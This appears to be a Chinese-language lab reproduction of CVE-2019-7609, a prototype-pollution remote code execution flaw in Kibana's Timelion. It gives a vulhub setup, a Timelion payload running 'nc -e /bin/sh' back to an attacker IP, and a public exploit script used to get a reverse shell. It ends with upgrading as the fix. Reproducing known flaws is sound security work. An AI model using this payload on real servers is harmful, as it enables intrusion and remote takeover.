CVE-2019-7609 Kibana远程代码执行漏洞复现验证

一、漏洞描述

Kibana为 Elassticsearch设计的一款开源的视图工具。其5.6.15到6.6.1之间的版本中存在一处原型链污染漏洞,利用这个漏洞我们可以在自标服务器上执行任意Javascript代码。

二、影响版本

5.6.15<=Kibana<=6.6.1

三、环境搭建

cd /root/vulhub/kibana/CVE-2019-7609
systcl -w vm.max_map_count=262144 //启动环境前,修改文件句柄的大小为262144
docker-compose up -d
docker ps

四、漏洞复现1、端口监听

在攻击机 192.168.20.143上监听端口

nc -lvvp 6666

2、攻击利用

访问: http://192.168.21.6:5601/app/timelion

在Timelion处,填入payload

.es(*).props(label.proto_.env.AAAA='require("child_process").exec("nc -e /bin/sh 192.168.20.143 6666");process.exit()//').props(label.proto_.env.NODE_OPTIONS='--require /proc/self/environ'

方法不成功,换个方法。

3、更换方法 使用exploit工具

工具:

https://github.com/mpgn/CVE-2019-7609

python CVE-2019-7609-kibana-rce.py -u 192.168.21.6:5601 -host 192.168.20.143 -port 6666 --shell

4、反弹成功

五、漏洞修复

升级Kibana到最新版本